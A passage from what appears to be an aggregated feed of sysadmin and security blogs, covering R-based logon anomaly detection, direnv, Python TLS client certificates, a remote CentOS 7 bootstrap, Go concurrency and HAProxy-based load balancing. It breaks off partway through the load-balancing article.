• Only men care about stock-options as a high priority benefit.

There was something else I noticed in the charts, and it was hinted at in the official report. On the 'assessing a job opportunity' question, men famously ranked diversity as their least important aspect. It looks like there was a clear "one star review" effect at work here. This is the chart of preferences for Men on that question.

Note the curve of the 'Diversity' line. It's pretty smooth, until you get to 10 when it jumps sharply. That says a large population of respondents knew that Diversity would be their last-ranked item from the start, and the ranking didn't show up organically. The curve of the other lines suggests that 'Broad use of product' and 'Department/Team' were robbed of rankings to feed the Diversity tanking.

However, this is an extreme example of something I saw in the other genders. The Women show it pretty well. Look at the curves between 9 and 10. The items that were ranked in the top 3 have smooth curves across the chart.
Yet something like Remote Working, which had an even distribution across ranks 1 through 9, suddenly jumps for rank 10. Looking at these curves, people have very clear opinions on what their top and bottom ranks are.

If you've read this far, you've noticed I've pretty much ignored rankings 4 through 9. I believe these second charts show why that is; there isn't much information in them. In my opinion this is bad survey design. Having people rank a long list of things from least to most will give you a lot of wishy-washy opinions, which is not enough to build a model off of. Instead, have them pick a top-3 and maybe a bottom-2. Leave the rest alone. That will give you much clearer signals about preferences.

### HolisticInfoSec.org

#### toolsmith #133 - Anomaly Detection & Threat Hunting with Anomalize

When, in October and November's toolsmith posts, I redefined DFIR under the premise of Deeper Functionality for Investigators in R, I discovered a "tip of the iceberg" scenario. To that end, I'd like to revisit the concept with an additional discovery and opportunity. In reality, this is really a case of DFIR (Deeper Functionality for Investigators in R) within the general practice of the original and paramount DFIR (Digital Forensics/Incident Response).

As discussed here before, those of us in the DFIR practice, and Blue Teaming at large, are overwhelmed by data and scale. Success truly requires algorithmic methods. If you're not already invested here, I have an immediately applicable case study for you in tidy anomaly detection with anomalize.

First, let me give credit where entirely due for the work that follows. Everything I discuss and provide is immediately derivative from Business Science (@bizScienc), specifically Matt Dancho (@mdancho84).
He created anomalize, "a tidy anomaly detection algorithm that’s time-based (built on top of tibbletime) and scalable from one to many time series," when a client asked Business Science to build an open source anomaly detection algorithm that suited their needs. I'd say he responded beautifully; when his blogpost hit my radar via R-Bloggers, it lived as an open tab in my browser for more than a month until generating this toolsmith. Please consider Matt's post a mandatory read as step one of the process here. I'll quote Matt specifically before shifting context:

"Our client had a challenging problem: detecting anomalies in time series on daily or weekly data at scale. Anomalies indicate exceptional events, which could be increased web traffic in the marketing domain or a malfunctioning server in the IT domain. Regardless, it’s important to flag these unusual occurrences to ensure the business is running smoothly. One of the challenges was that the client deals with not one time series but thousands that need to be analyzed for these extreme events."

Key takeaway: Detecting anomalies in time series on daily or weekly data at scale. Anomalies indicate exceptional events.

Now shift context with me to security-specific events and incidents, as they pertain to security monitoring, incident response, and threat hunting. In my November 2017 post, recall that I discussed Time Series Regression with the Holt-Winters method and a focus on seasonality and trends.
Unfortunately, I couldn't share the code for how we applied TSR, but pointed out alternate methods, including Seasonal and Trend Decomposition using Loess (STL):

• Handles any type of seasonality ~ can change over time
• Smoothness of the trend-cycle can also be controlled by the user
• Robust to outliers

Here now, Matt has created a means to immediately apply the STL method, along with the Twitter method (reference page), as part of his time_decompose() function, one of three functions specific to the anomalize package. In addition to time_decompose(), which separates the time series into seasonal, trend, and remainder components, anomalize includes:

• anomalize(): Applies anomaly detection methods to the remainder component.
• time_recompose(): Calculates limits that separate the “normal” data from the anomalies.

The methods used in anomalize(), including IQR and GESD, are described in Matt's reference page. Matt ultimately set out to build a scalable adaptation of Twitter's AnomalyDetection package in order to address his client's challenges in dealing with not one time series but thousands needing to be analyzed for extreme events.

You'll note that Matt describes anomalize using a dataset of the daily download counts of the 15 tidyverse packages from CRAN, relevant as he leverages the tidyverse package. I initially toyed with tweaking Matt's demo to model downloads for security-specific R packages (yes, there are such things) from CRAN, including RAppArmor, net.security, securitytxt, and cymruservices, the latter two courtesy of Bob Rudis (@hrbrmstr) of our beloved Data-Driven Security: Analysis, Visualization and Dashboards. Alas, this was a mere rip and replace, and really didn't exhibit the use of anomalize in a deserving, varied, truly security-specific context.
That said, I was able to generate immediate results doing so, as seen in Figure 1.

Figure 1: Initial experiment

As an initial experiment you can replace package names with those of your choosing in tidyverse_cran_downloads.R, run it in R Studio, then tweak variable names and labels in the code per Matt's README page.

I wanted to run anomalize against a real security data scenario, so I went back to the dataset from the original DFIR articles where I'd utilized counts of 4624 Event IDs per day, per user, on a given set of servers. As utilized originally, I'd represented results specific to only one device and user, but herein is the beauty of anomalize: we can achieve quick results across multiple time series (multiple systems/users). This premise is but one of many where time series analysis and seasonality can be applied to security data.

I originally tried to read log data from log.csv straight into an anomalize.R script with logs = read_csv("log.csv") into a tibble (ready your troubles-with-tibbles jokes), which was not being parsed accurately, particularly the time attributes. To correct this, from Matt's Github I grabbed tidyverse_cran_downloads.R and modified it as follows:

This helped greatly thanks to the tibbletime package, which "is an extension that allows for the creation of time aware tibbles. Some immediate advantages of this include: the ability to perform time based subsetting on tibbles, quickly summarising and aggregating results by time periods." Guess what, Matt wrote tibbletime too. :-)

I then followed Matt's sequence as he posted on Business Science, but with my logs defined as a function in Security_Access_Logs_Function.R. Following, I'll give you the code snippets, as revised from Matt's examples, followed by their respective results specific to processing my Event ID 4624 daily count log.

First, let's summarize daily login counts across three servers over four months. The result is evident in Figure 2.
Figure 2: Server logon counts visualized

Next, let's determine which daily logon counts are anomalous with Matt's three main functions, time_decompose(), anomalize(), and time_recompose(), along with the visualization function, plot_anomalies(), across the same three servers over four months. The result is revealed in Figure 3.

Figure 3: Security event log anomalies

Following Matt's method using Twitter’s AnomalyDetection package, combining time_decompose(method = "twitter") with anomalize(method = "gesd"), while adjusting trend = "4 months" to adjust median spans, we'll focus only on SERVER-549521. In Figure 4, you'll note that there are anomalous logon counts on SERVER-549521 in June.

Figure 4: SERVER-549521 logon anomalies with Twitter & GESD methods

We can compare the Twitter (time_decompose) and GESD (anomalize) methods with the STL (time_decompose) and IQR (anomalize) methods, which use different decomposition and anomaly detection approaches. Again, we note anomalies in June, as seen in Figure 5.

Figure 5: SERVER-549521 logon anomalies with STL & IQR methods

Obviously, the results are quite similar, as one would hope. Finally, let's use Matt's plot_anomaly_decomposition() to visualize the inner workings of how the algorithm detects anomalies in the remainder for SERVER-549521. The result is a four-part visualization, including observed, season, trend, and remainder, as seen in Figure 6.

Figure 6: Decomposition for SERVER-549521 Logins

I'm really looking forward to putting these methods to use at a much larger scale, across a far broader event log dataset. I firmly assert that blue teams are already way behind in combating automated adversary tactics and problems of sheer scale, so...much...data. It's only with tactics such as Matt's anomalize, and others of its ilk, that defenders can hope to succeed.
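For intuition, the IQR rule that anomalize() can apply works roughly like the following sketch. This is a hedged, simplified Python illustration rather than the package's actual R implementation; the multiplier of 3 mirrors a common extreme-outlier convention, and flag_iqr_anomalies is a hypothetical helper name:

```python
def flag_iqr_anomalies(values, multiplier=3.0):
    """Flag points outside [Q1 - m*IQR, Q3 + m*IQR] as anomalies.

    A simplified take on the IQR method: compute the interquartile
    range of the series (e.g. daily 4624-logon counts) and mark
    anything far outside it.
    """
    xs = sorted(values)
    n = len(xs)

    def quantile(q):
        # Linear interpolation between closest ranks
        pos = q * (n - 1)
        lo, hi = int(pos), min(int(pos) + 1, n - 1)
        return xs[lo] + (pos - lo) * (xs[hi] - xs[lo])

    q1, q3 = quantile(0.25), quantile(0.75)
    iqr = q3 - q1
    lower, upper = q1 - multiplier * iqr, q3 + multiplier * iqr
    return [v < lower or v > upper for v in values]

# A burst of logons on an otherwise quiet server stands out:
counts = [12, 14, 11, 13, 12, 15, 190, 13]
```

anomalize() applies this kind of test to the remainder component after time_decompose() has stripped out season and trend, which is why seasonal logon spikes don't get flagged.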
Be sure to watch Matt's YouTube video on anomalize; Business Science is building a series of videos in addition, so keep an eye out there and on their GitHub for more great work that we can apply a blue team/defender's context to. All the code snippets are in my GitHubGist here, and the sample log file, a single R script, and a Jupyter Notebook are all available for you on my GitHub under toolsmith_r. I hope you find anomalize as exciting and useful as I have. Great work by Matt; looking forward to seeing what's next from Business Science.

Cheers...until next time.

## June 03, 2018

### Electricmonk.nl

#### direnv: Directory-specific environments

Over the course of a single day I might work on a dozen different admin or development projects. In the morning I could be hacking on some Zabbix monitoring scripts, in the afternoon on auto-generated documentation, and in the evening on a Python or C project. I try to keep my system clean and my projects as compartmentalized as possible, to avoid library version conflicts and such. When jumping from one project to another, the requirements of my shell environment can change significantly. One project may require /opt/nim/bin to be in my PATH. Another project might require a Python VirtualEnv to be active, or to have GOPATH set to the correct value. All in all, switching from one project to another incurs some overhead, especially if I haven't worked on it for a while.

Wouldn't it be nice if we could have our environment automatically set up simply by changing to the project's directory? With direnv we can.

direnv is an environment switcher for the shell. It knows how to hook into bash, zsh, tcsh, fish shell and elvish to load or unload environment variables depending on the current directory. This allows project-specific environment variables without cluttering the ~/.profile file. Before each prompt, direnv checks for the existence of a ".envrc" file in the current and parent directories.
If the file exists (and is authorized), it is loaded into a bash sub-shell and all exported variables are then captured by direnv and made available to the current shell.

It's easy to use. Here's a quick guide:

Install direnv (I'm using Ubuntu, but direnv is available for many Unix-like systems):

fboender @ jib ~ $ sudo apt install direnv

You'll have to add direnv to your .bashrc in order for it to work:

fboender @ jib ~ $ tail -n1 ~/.bashrc
eval "$(direnv hook bash)"

In the base directory of your project, create a .envrc file. For example:

fboender @ jib ~ $ cat ~/Projects/fboender/foobar/.envrc
#!/bin/bash

# Settings
PROJ_DIR="$PWD"
PROJ_NAME="foobar"
VENV_DIR="/home/fboender/.pyenvs"
PROJ_VENV="$VENV_DIR/$PROJ_NAME"

# Create Python virtualenv if it doesn't exist yet
if [ \! -d "$PROJ_VENV" ]; then
    echo "Creating new environment"
    virtualenv -p python3 $PROJ_VENV
    echo "Installing requirements"
    $PROJ_VENV/bin/pip3 install -r ./requirements.txt
fi

# Emulate the virtualenv's activate, because we can't source things in direnv
export VIRTUAL_ENV="$PROJ_VENV"
export PATH="$PROJ_VENV/bin:$PATH:$PWD"
export PS1="($(basename \"$VIRTUAL_ENV\")) $PS1"
export PYTHONPATH="$PWD/src"


This example automatically creates a Python3 virtualenv for the project if it doesn't exist yet, and installs the dependencies. Since we can only export environment variables directly, I'm emulating the virtualenv's bin/activate script by setting some Python-specific variables and exporting a new prompt.
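direnv's trick of running the .envrc in a bash sub-shell and capturing the exported variables can be sketched in a few lines of Python. This is a rough illustration of the mechanism, not direnv's actual implementation, and capture_exports is a hypothetical helper name:

```python
import os
import subprocess

def capture_exports(script: str) -> dict:
    """Run a script in a bash sub-shell and return the variables it
    exported, roughly how direnv captures an .envrc."""
    out = subprocess.run(
        ["bash", "-c", script + "\nenv -0"],
        capture_output=True, check=True, text=True,
    ).stdout
    new_env = dict(
        line.split("=", 1) for line in out.split("\0") if "=" in line
    )
    # Keep only variables that differ from the parent environment
    return {k: v for k, v in new_env.items() if os.environ.get(k) != v}

diff = capture_exports('export PROJ_NAME=foobar')
```

Because only the sub-shell's exported environment crosses back, shell functions and aliases defined in an .envrc don't survive, which is why the example emulates bin/activate with plain exports.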

Now when we change to the project's directory, or any underlying directory, direnv tries to activate the environment:

fboender @ jib ~ $ cd ~/Projects/fboender/foobar/
direnv: error .envrc is blocked. Run direnv allow to approve its content.

This warning is to be expected. Running random code when you switch to a directory can be dangerous, so direnv wants you to explicitly confirm that it's okay. When you see this message, you should always verify the contents of the .envrc file!

We allow the .envrc, and direnv starts executing the contents. Since the Python virtualenv is missing, it automatically creates it and installs the required dependencies. It then sets some paths in the environment and changes the prompt:

fboender @ jib ~ $ direnv allow
Creating new environment
Using base prefix '/usr'
New python executable in /home/fboender/.pyenvs/foobar/bin/python3
Also creating executable in /home/fboender/.pyenvs/foobar/bin/python
Installing setuptools, pkg_resources, pip, wheel...done.
Installing requirements
Collecting jsonxs (from -r ./requirements.txt (line 1))
Collecting requests (from -r ./requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/49/df/50aa1999ab9bde74656c2919d9c0c085fd2b3775fd3eca826012bef76d8c/requests-2.18.4-py2.py3-none-any.whl
Collecting tempita (from -r ./requirements.txt (line 3))
Collecting urllib3<1.23,>=1.21.1 (from requests->-r ./requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/63/cb/6965947c13a94236f6d4b8223e21beb4d576dc72e8130bd7880f600839b8/urllib3-1.22-py2.py3-none-any.whl
Collecting chardet<3.1.0,>=3.0.2 (from requests->-r ./requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/bc/a9/01ffebfb562e4274b6487b4bb1ddec7ca55ec7510b22e4c51f14098443b8/chardet-3.0.4-py2.py3-none-any.whl
Collecting certifi>=2017.4.17 (from requests->-r ./requirements.txt (line 2))
Collecting idna<2.7,>=2.5 (from requests->-r ./requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/27/cc/6dd9a3869f15c2edfab863b992838277279ce92663d334df9ecf5106f5c6/idna-2.6-py2.py3-none-any.whl
Installing collected packages: jsonxs, urllib3, chardet, certifi, idna, requests, tempita
Successfully installed certifi-2018.4.16 chardet-3.0.4 idna-2.6 jsonxs-0.6 requests-2.18.4 tempita-0.5.2 urllib3-1.22
direnv: export +PYTHONPATH +VIRTUAL_ENV ~PATH
(foobar) fboender @ jib ~/Projects/fboender/foobar (master) $

I can now work on the project without having to manually switch anything. When I'm done with the project and change to a different dir, it automatically unloads:

(foobar) fboender @ jib ~/Projects/fboender/foobar (master) $ cd ~
fboender @ jib ~ $

And that's about it! You can read more about direnv on its homepage.

## June 02, 2018

### Electricmonk.nl

#### SSL/TLS client certificate verification with Python v3.4+ SSLContext

Normally, an SSL/TLS client verifies the server's certificate. It's also possible for the server to require a signed certificate from the client. These are called Client Certificates. This ensures that not only can the client trust the server, but the server can also trust the client.

Traditionally in Python, you'd pass the ca_certs parameter to the ssl.wrap_socket() function on the server to enable client certificates:

# Client
ssl.wrap_socket(s,
                ca_certs="ssl/server.crt",
                cert_reqs=ssl.CERT_REQUIRED,
                certfile="ssl/client.crt",
                keyfile="ssl/client.key")

# Server
ssl.wrap_socket(connection,
                server_side=True,
                certfile="ssl/server.crt",
                keyfile="ssl/server.key",
                ca_certs="ssl/client.crt")

Since Python v3.4, the more secure, and thus preferred, method of wrapping a socket in the SSL/TLS layer is to create an SSLContext instance and call SSLContext.wrap_socket(). However, the SSLContext.wrap_socket() method does not have the ca_certs parameter, and it is not directly obvious how to require client certificates on the server side.

The documentation for SSLContext.load_default_certs() does mention client certificates:

Purpose.CLIENT_AUTH loads CA certificates for client certificate verification on the server side.

But SSLContext.load_default_certs() loads the system's default trusted Certificate Authority chains so that the client can verify the server's certificates. You generally don't want to use these for client certificates.

In the Verifying Certificates section, it mentions that you need to specify CERT_REQUIRED:

In server mode, if you want to authenticate your clients using the SSL layer (rather than using a higher-level authentication mechanism), you’ll also have to specify CERT_REQUIRED and similarly check the client certificate.
I didn't spot how to specify CERT_REQUIRED in either the SSLContext constructor or the wrap_socket() method. It turns out you have to manually set a property on the SSLContext on the server to enable client certificate verification, like this:

```python
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.verify_mode = ssl.CERT_REQUIRED
context.load_cert_chain(certfile=server_cert, keyfile=server_key)
context.load_verify_locations(cafile=client_certs)
```

Here's a full example of a client and server who both validate each other's certificates. For this example, we'll create self-signed server and client certificates. Normally you'd use a server certificate from a Certificate Authority such as Let's Encrypt, and would set up your own Certificate Authority so you can sign and revoke client certificates.

Create the server certificate:

```
openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout server.key -out server.crt
```

Make sure to enter 'example.com' for the Common Name. Next, generate a client certificate:

```
openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout client.key -out client.crt
```

The Common Name for the client certificate doesn't really matter.

Client code:

```python
#!/usr/bin/python3

import socket
import ssl

host_addr = '127.0.0.1'
host_port = 8082
server_sni_hostname = 'example.com'
server_cert = 'server.crt'
client_cert = 'client.crt'
client_key = 'client.key'

context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=server_cert)
context.load_cert_chain(certfile=client_cert, keyfile=client_key)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn = context.wrap_socket(s, server_side=False, server_hostname=server_sni_hostname)
conn.connect((host_addr, host_port))
print("SSL established. Peer: {}".format(conn.getpeercert()))
print("Sending: 'Hello, world!")
conn.send(b"Hello, world!")
print("Closing connection")
conn.close()
```

Server code:

```python
#!/usr/bin/python3

import socket
from socket import AF_INET, SOCK_STREAM, SO_REUSEADDR, SOL_SOCKET, SHUT_RDWR
import ssl

listen_addr = '127.0.0.1'
listen_port = 8082
server_cert = 'server.crt'
server_key = 'server.key'
client_certs = 'client.crt'

context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.verify_mode = ssl.CERT_REQUIRED
context.load_cert_chain(certfile=server_cert, keyfile=server_key)
context.load_verify_locations(cafile=client_certs)

bindsocket = socket.socket()
bindsocket.bind((listen_addr, listen_port))
bindsocket.listen(5)

while True:
    print("Waiting for client")
    newsocket, fromaddr = bindsocket.accept()
    print("Client connected: {}:{}".format(fromaddr[0], fromaddr[1]))
    conn = context.wrap_socket(newsocket, server_side=True)
    print("SSL established. Peer: {}".format(conn.getpeercert()))
    buf = b''  # Buffer to hold received client data
    try:
        while True:
            data = conn.recv(4096)
            if data:
                # Client sent us data. Append to buffer
                buf += data
            else:
                # No more data from client. Show buffer and close connection.
                print("Received:", buf)
                break
    finally:
        print("Closing connection")
        conn.shutdown(socket.SHUT_RDWR)
        conn.close()
```

Output from the server looks like this:

```
$ python3 ./server.py
Waiting for client
Client connected: 127.0.0.1:51372
SSL established. Peer: {'subject': ((('countryName', 'AU'),),
(('stateOrProvinceName', 'Some-State'),), (('organizationName', 'Internet
Widgits Pty Ltd'),), (('commonName', 'someclient'),)), 'issuer':
((('countryName', 'AU'),), (('stateOrProvinceName', 'Some-State'),),
(('organizationName', 'Internet Widgits Pty Ltd'),), (('commonName',
'someclient'),)), 'notBefore': 'Jun  1 08:05:39 2018 GMT', 'version': 3,
'serialNumber': 'A564F9767931F3BC', 'notAfter': 'Jun  1 08:05:39 2019 GMT'}
Closing connection
Waiting for client
```
Output from the client:

```
$ python3 ./client.py
SSL established. Peer: {'notBefore': 'May 30 20:47:38 2018 GMT', 'notAfter': 'May 30 20:47:38 2019 GMT', 'subject': ((('countryName', 'NL'),), (('stateOrProvinceName', 'GLD'),), (('localityName', 'Ede'),), (('organizationName', 'Electricmonk'),), (('commonName', 'example.com'),)), 'issuer': ((('countryName', 'NL'),), (('stateOrProvinceName', 'GLD'),), (('localityName', 'Ede'),), (('organizationName', 'Electricmonk'),), (('commonName', 'example.com'),)), 'version': 3, 'serialNumber': 'CAEC89334941FD9F'}
Sending: 'Hello, world!
Closing connection
```

A few notes:

• You can concatenate multiple client certificates into a single PEM file to authenticate different clients.
• You can re-use the same cert and key on both the server and client. This way, you don't need to generate a specific client certificate. However, any clients using that certificate will require the key, and will be able to impersonate the server. There's also no way to distinguish between clients anymore.
• You don't need to set up your own Certificate Authority and sign client certificates. You can just generate them with the above-mentioned openssl command and add them to the trusted certificates file. If you no longer trust the client, just remove the certificate from the file.
• I'm not sure if the server verifies the client certificate's expiration date.

## June 01, 2018

### Everything Sysadmin

#### I'm hiring SREs/sysadmins and more!

My team at Stack Overflow has a number of open positions on the team that I manage:

1. Windows-focused SRE, New York City or Northern NJ: If you love PowerShell, you'll love this position! If your background is more sysadmin than SRE, we're willing to train.
2. Linux SRE, Denver: This will be particularly exciting because we're about to make some big technology changes and it will be a great opportunity to learn and grow with the company.

We have a number of other openings around the company:

1. Junior Technology Concierge (IT Help Desk): New York City
2. Engineering Manager: Remote (US East Coast Time Zone)
3. VP of Engineering: New York City. (This person will be my boss!)
4. Technical Recruiter: New York, NY
5. If you like working in the Windows developer ecosystem (C#, ASP.NET, and MS SQL Server), we have two such developer positions: web developer and internal apps developer.

Those (and more!) open positions are listed here: https://stackoverflow.com/work-here

### Anton Chuvakin - Security Warrior

#### Monthly Blog Round-Up – May 2018

Here is my next monthly "Security Warrior" blog round-up of the top 5 popular posts based on last month's visitor data (excluding other monthly or annual round-ups):

1. "New SIEM Whitepaper on Use Cases In-Depth OUT!" (dated 2010 – much ancient!) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using a now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our research on developing security monitoring use cases here – and note that we UPDATED it FOR 2018.
2. "Why No Open Source SIEM, EVER?" contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge. Succeeding with SIEM requires a lot of work, whether you paid for the software or not. BTW, this post has an amazing "staying power" that is hard to explain – I suspect it has to do with people wanting "free stuff" and googling for "open source SIEM"…
3. "Simple Log Review Checklist Released!" is often at the top of this list – this rapidly aging checklist is still a useful tool for many people. "On Free Log Management Tools" (also aged quite a bit by now) is a companion to the checklist (updated version).
4. "Updated With Community Feedback SANS Top 7 Essential Log Reports DRAFT2" is about the top log reports project of 2008-2013. I think these are still very useful in response to "what reports will give me the best insight from my logs?"
5. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts covers a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book – note that this series is even mentioned in some PCI Council materials.

In addition, I'd like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 7X the traffic of this blog]: critical reference posts on current research on SIEM, SOC, etc; just-finished research on testing security; just-finished research on a threat detection "starter kit"; and some miscellaneous fun posts. (See all my published Gartner research here.)

Also see my past monthly and annual "Top Popular Blog Posts" – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017.

Disclaimer: most content at the Security Warrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

Other posts in this endless series:

## May 24, 2018

### The Lone Sysadmin

#### vSphere 6.7 Will Not Run In My Lab: A Parable

"Hey Bob, I tried installing vSphere 6.7 on my lab servers and it doesn't work right. You tried using it yet? Been beating my head against a wall here."

"Yeah, I really like it. A lot. Like, resisting the urge to be irresponsible and upgrade everything. What are your lab servers?"

I knew what he […]

The post vSphere 6.7 Will Not Run In My Lab: A Parable appeared first on The Lone Sysadmin. Head over to the source to read the full post!
## May 23, 2018

### Evaggelos Balaskas

#### CentOS Bootstrap

## CentOS 6

This method has been suggested for building a container image from your current CentOS system. In my case, I need to remotely upgrade a running CentOS 6 system to a new clean CentOS 7 on a test VPS, without the need of opening the VNC console, attaching a new ISO, etc. I am rather lucky as I have a clean extra partition on this VPS, so I will follow the below process to remotely install a new clean CentOS 7 to this partition, then add a new grub entry and boot into this partition.

### Current OS

```
# cat /etc/redhat-release
CentOS release 6.9 (Final)
```

### Format partition

Format & mount the partition:

```
mkfs.ext4 -L rootfs /dev/vda5
mount /dev/vda5 /mnt/
```

### InstallRoot

Type:

```
# yum -y groupinstall "Base" --releasever 7 --installroot /mnt/ --nogpgcheck
```

### Test

Test it, when finished:

```
mount --bind /dev/ /mnt/dev/
mount --bind /sys/ /mnt/sys/
mount --bind /proc/ /mnt/proc/
chroot /mnt/

bash-4.2# cat /etc/redhat-release
CentOS Linux release 7.5.1804 (Core)
```

It works!

### Root Password

Inside the chroot environment:

```
bash-4.2# passwd
Changing password for user root.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
bash-4.2# exit
```

## Grub

Adding the new grub entry for CentOS 7:

```
title CentOS 7
        root (hd0,4)
        kernel /boot/vmlinuz-3.10.0-862.2.3.el7.x86_64 root=/dev/vda5 ro rhgb LANG=en_US.UTF-8
        initrd /boot/initramfs-3.10.0-862.2.3.el7.x86_64.img
```

By changing the default boot entry from 0 to 1 (default=0 to default=1), our system will boot into CentOS 7 on reboot!

### syslog.me

#### Concurrency in Go

In my quest to learn the Go language I am currently in the process of doing the Go Code Clinic.
It's taking me quite some time because instead of going through the solutions proposed in the course I try to implement a solution by myself; only when I have no idea whatsoever about how to proceed do I peep into the solution to get some insight, and then work independently on my solution again.

The second problem in the Clinic is already at a non-trivial level: compare a number of images with a bigger image to check if any of those is a "clipping" of the bigger one. I confess that I would have a lot to read and to work on even if I was trying to solve it in Perl! It took some banging of my head against the wall till I eventually solved the problem.

Unfortunately my program is single-threaded and the process of matching images is very expensive. For example, it took more than two hours to match a clipping sized 967×562 pixels with its "base" image sized 2048×1536. And for the whole time only one CPU thread was running at 100%; the others were barely used. If I really want to say that I solved the problem I must adapt the program to the available computing power by starting a number of subprocesses/threads (in our case: goroutines) to distribute the search across several CPU threads.

Since this was completely new to me in golang, I decided to experiment with a much simpler program: generate up to 100 random integers (say) between 0 and 10000 and run 8 workers to find if any of these random numbers is a multiple of another number, for example 17. And of course the program must shut down gracefully, whether or not a multiple is found. This gave me a few problems to solve:

• how do I start exactly 8 worker goroutines?
• what's the best way to pass them the numbers to check? what's the best way for them to report back the result?
• how do I tell them to stop when it's time that they shut down?
• how do I wait until they have actually shut down?

The result is the Go program that you can find in this gist.
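For comparison, the same coordination questions can be sketched in Python with threads and queues. This is my own illustration, not the code from the gist, and for genuinely CPU-bound work in Python you would use multiprocessing instead, since threads don't run Python bytecode in parallel; still, the pattern of "start N workers, feed them work, collect results, shut them down, wait for them" looks the same:

```python
import queue
import threading

NUM_WORKERS = 8
DIVISOR = 17

def worker(jobs, results):
    # Pull numbers until we see the None sentinel, then exit.
    while True:
        n = jobs.get()
        if n is None:
            break
        if n % DIVISOR == 0:
            results.put(n)

def find_multiples(numbers, num_workers=NUM_WORKERS):
    jobs = queue.Queue()     # work channel (Go: a chan int)
    results = queue.Queue()  # result channel
    # Start exactly num_workers workers (the Go version starts goroutines).
    workers = [threading.Thread(target=worker, args=(jobs, results))
               for _ in range(num_workers)]
    for w in workers:
        w.start()
    for n in numbers:
        jobs.put(n)
    # One sentinel per worker tells them to shut down
    # (Go would close the channel instead).
    for _ in range(num_workers):
        jobs.put(None)
    # Joining the threads is the equivalent of sync.WaitGroup.Wait().
    for w in workers:
        w.join()
    found = []
    while not results.empty():
        found.append(results.get())
    return sorted(found)

print(find_multiples([3, 17, 40, 34, 100]))  # multiples of 17: [17, 34]
```

The Go program in the gist answers the same four questions with goroutines, channels and a WaitGroup.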
Assuming that it is good enough, you can use it as a skeleton for a program of yours, re-implementing the worker part and maybe the reaper part if a boolean response is not enough. Enjoy!

#### Lightning Calendar, Google and "foreign" addresses

This is written to my older self, and to all those using Mozilla Thunderbird and the Lightning Calendar add-on with Google calendars who see this:

If you are seeing this, the solution is to change the setting calendar.google.enableEmailInvitations to true, and everything should work as expected. Enjoy!

### Vincent Bernat

#### Multi-tier load-balancing with Linux

A common solution to provide a highly-available and scalable service is to insert a load-balancing layer to spread requests from users to backend servers.1 We usually have several expectations for such a layer:

• scalability: It allows a service to scale by pushing traffic to newly provisioned backend servers. It should also be able to scale itself when it becomes the bottleneck.
• availability: It provides high availability to the service. If one server becomes unavailable, the traffic should be quickly steered to another server. The load-balancing layer itself should also be highly available.
• flexibility: It handles both short and long connections. It is flexible enough to offer all the features backends generally expect from a load-balancer, like TLS or HTTP routing.
• operability: With some cooperation, any expected change should be seamless: rolling out new software on the backends, adding or removing backends, or scaling the load-balancing layer itself up or down.

The problem and its solutions are well known. Among recently published articles on the topic, "Introduction to modern network load-balancing and proxying" provides an overview of the state of the art. Google released "Maglev: A Fast and Reliable Software Network Load Balancer" describing their in-house solution in detail.2 However, the associated software is not available.
Basically, building a load-balancing solution with commodity servers consists of assembling three components:

• ECMP routing
• stateless L4 load-balancing
• stateful L7 load-balancing

In this article, I describe and support a multi-tier solution using Linux and only open-source components. It should offer you the basis to build a production-ready load-balancing layer.

Update (2018.05): Facebook just released Katran, an L4 load-balancer implemented with XDP and eBPF and using consistent hashing. It could be inserted in the configuration described below.

# Last tier: L7 load-balancing⚓︎

Let's start with the last tier. Its role is to provide high availability, by forwarding requests only to healthy backends, and scalability, by spreading requests fairly between them. Working in the highest layers of the OSI model, it can also offer additional services, like TLS termination, HTTP routing, header rewriting, rate-limiting of unauthenticated users, and so on. Being stateful, it can leverage complex load-balancing algorithms. Being the first point of contact with backend servers, it should ease maintenance and minimize impact during daily changes.

It also terminates client TCP connections. This introduces some loose coupling between the load-balancing components and the backend servers, with the following benefits:

• connections to servers can be kept open for lower resource use and latency,
• requests can be retried transparently in case of failure,
• clients can use a different IP protocol than servers, and
• servers do not have to care about path MTU discovery, TCP congestion control algorithms, avoidance of the TIME-WAIT state and various other low-level details.

Many pieces of software would fit in this layer and an ample literature exists on how to configure them. You could look at HAProxy, Envoy or Træfik.
Here is a configuration example for HAProxy:

```
# L7 load-balancer endpoint
frontend l7lb
  # Listen on both IPv4 and IPv6
  bind :80 v4v6
  # Redirect everything to a default backend
  default_backend servers
  # Healthchecking
  acl dead disabled nbsrv(servers) lt 1
  acl disabled nbsrv(enabler) lt 1
  monitor-uri /healthcheck
  monitor fail if dead || disabled

# IPv6-only servers with HTTP healthchecking and remote agent checks
backend servers
  balance roundrobin
  option httpchk
  server web1 [2001:db8:1:0:2::1]:80 send-proxy check agent-check agent-port 5555
  server web2 [2001:db8:1:0:2::2]:80 send-proxy check agent-check agent-port 5555
  server web3 [2001:db8:1:0:2::3]:80 send-proxy check agent-check agent-port 5555
  server web4 [2001:db8:1:0:2::4]:80 send-proxy check agent-check agent-port 5555

# Fake backend: if the local agent check fails, we assume we are dead
backend enabler
  server enabler [::1]:0 agent-check agent-port 5555
```

This configuration is the most incomplete piece of this guide. However, it illustrates two key concepts for operability:

1. Healthchecking of the web servers is done both at the HTTP level (with check and option httpchk) and using an auxiliary agent check (with agent-check). The latter makes it easy to put a server into maintenance or to orchestrate a progressive rollout. On each backend, you need a process listening on port 5555 and reporting the status of the service (UP, DOWN, MAINT). A simple socat process can do the trick:3

```
